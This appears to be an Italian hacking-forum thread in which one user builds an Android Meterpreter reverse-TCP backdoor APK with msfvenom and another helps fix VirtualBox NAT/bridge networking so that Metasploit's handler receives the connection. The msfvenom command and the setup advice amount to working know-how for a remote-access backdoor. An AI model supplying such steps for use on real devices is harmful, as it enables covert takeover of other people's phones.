Discussione Malware Backdoor v. Obsoleta?

[cilibe56]

Allora ho un piccolo problema faccio la backdoor con
Msfvenom - p android/meterpreter/reverse_tcp LHOST=avendo un ip dinamico ho messo 10.0.2.15 (quello di eth0) LPORT=4444 R > nomebackoor.apk

poi lo esporto sul telefono che stiamo nella stessa connessione e avvio metasploit soloto discorso exploi/milti/handler
Payload di prima ip(qui ho messo quello del router perché non so cosa mettere)
Port 4444
Poi exploit e avvio la porta su Android e metà non riconosce nnt aiuto

 

[0xbro]

Allora ho un piccolo problema faccio la backdoor con
Msfvenom - p android/meterpreter/reverse_tcp LHOST=avendo un ip dinamico ho messo 10.0.2.15 (quello di eth0) LPORT=4444 R > nomebackoor.apk

poi lo esporto sul telefono che stiamo nella stessa connessione e avvio metasploit soloto discorso exploi/milti/handler
Payload di prima ip(qui ho messo quello del router perché non so cosa mettere)
Port 4444
Poi exploit e avvio la porta su Android e metà non riconosce nnt aiuto

Partiamo dalla base: che IP ha il tuo telefono? Sei sicuro siano sulla stessa rete? Vedendo quel 10.0.2.15 sembra tanto che l'host sia su una macchina virtuale dietro NAT

 

[cilibe56]

Partiamo dalla base: che IP ha il tuo telefono? Sei sicuro siano sulla stessa rete? Vedendo quel 10.0.2.15 sembra tanto che l'host sia su una macchina virtuale dietro NAT

Si è su Nat e sono sulla stessa rete

 

[0xbro]

Si è su Nat e sono sulla stessa rete

Se è in Nat non può essere sulla stessa rete, proprio perchè la rete della VM è dietro NAT. Non a caso immagino l'IP del cellulare sia 192.168.x.x mentre quello della VM è 10.0.x.x Il primo problema quindi è quello.

Messi i due device sulla stessa rete, il payload meterpreter deve puntare alla macchina dell'attaccante tramite (come stai già facendo) mentre il multi/handler deve istanziare la connessione (deve utilizzare lo stesso IP e porta impostati sul payload meterpreter)

 

[cilibe56]

Se è in Nat non può essere sulla stessa rete, proprio perchè la rete della VM è dietro NAT. Non a caso immagino l'IP del cellulare sia 192.168.x.x mentre quello della VM è 10.0.x.x Il primo problema quindi è quello.

Messi i due device sulla stessa rete, il payload meterpreter deve puntare alla macchina dell'attaccante tramite (come stai già facendo) mentre il multi/handler deve istanziare la connessione (deve utilizzare lo stesso IP e porta impostati sul payload meterpreter)

Quindi devo mettere su bridge non su Nat questo mi vuoi dire?

 

[0xbro]

Quindi devo mettere su bridge non su Nat questo mi vuoi dire?

Non ti dirò nè sì nè no, devi capirlo da te come fare e se quella sia o meno la soluzione Io ti ho evidenziato il problema e indirizzato vero la soluzione, la risoluzione effettiva dovrai capirla da solo

 

[cilibe56]

Non ti dirò nè sì nè no, devi capirlo da te come fare e se quella sia o meno la soluzione Io ti ho evidenziato il problema e indirizzato vero la soluzione, la risoluzione effettiva dovrai capirla da solo

Ma il problema è che non mi legge la scheda di rete in Bridge uffa ahha

 

[0xbro]

Ma il problema è che non mi legge la scheda di rete in Bridge uffa ahha

Che programma di virtualizzazione stai usando?

 

[cilibe56]

Che programma di virtualizzazione stai usando?

Kali linux su Virtual box
Pensavo fosse semplice

 

[0xbro]

Kali linux su Virtual box
Pensavo fosse semplice

In teoria non dovrebbe essere necessaria nessuna azione straordinaria, al massimo dai un'occhiata a quali schede sono disponibili e prova a cambiarle

 

[cilibe56]

a me ci sono due opzioni una non me l'ha fa selezionare aspe ti allego un file non mi esce piu nessuna sheda di rete

 

[0xbro]

a me ci sono due opzioni una non me l'ha fa selezionare aspe ti allego un file non mi esce piu nessuna sheda di rete

mmm boh, in teoria è tutto qua, non c'è molto da fare, non so quale possa essere il motivo... come mai dici che la modalità bridge non funziona?

 

[cilibe56]

mmm boh, in teoria è tutto qua, non c'è molto da fare, non so quale possa essere il motivo... come mai dici che la modalità bridge non funziona?

Per vedere se funziona posso fare un semplice ifconfgi e vedere se mi imposta un ip che non sia 10.0.2.15?

 

[0xbro]

Per vedere se funziona posso fare un semplice ifconfgi e vedere se mi imposta un ip che non sia 10.0.2.15?

Sì, deve assegnarti un IP di quelli disponibili dal tuo router. Non posso sapere esattamente quale, ma dovrebbe essere uno del tipo 192.168.x.x
Per avere conferma apri un terminale da windows e digita ipconfig. L'ip che dovrà avere la tua macchina virtuale dovrà appartenere alla stessa sotto-rete di quello su windows

 

[cilibe56]

Sì, deve assegnarti un IP di quelli disponibili dal tuo router. Non posso sapere esattamente quale, ma dovrebbe essere uno del tipo 192.168.x.x
Per avere conferma apri un terminale da windows e digita ipconfig. L'ip che dovrà avere la tua macchina virtuale dovrà appartenere alla stessa sotto-rete di quello su windows

Quindi con scheda bridge devo mettere un ip statico con ip lo stesso quello di Windows?

 

[0xbro]

Quindi con scheda bridge devo mettere un ip statico con ip lo stesso quello di Windows?

Nono, non possono esistere due ip uguali nella stesse rete...

Devi solo verificare che l'IP della vm sia nella stessa rete di quello di Windows (se uno è 192.168.x.x e l'altro è 10.x.x.x, allora non lo sono. Se uno è 192.168.x.x e l'altro 192.168.x.y, allora lo sono)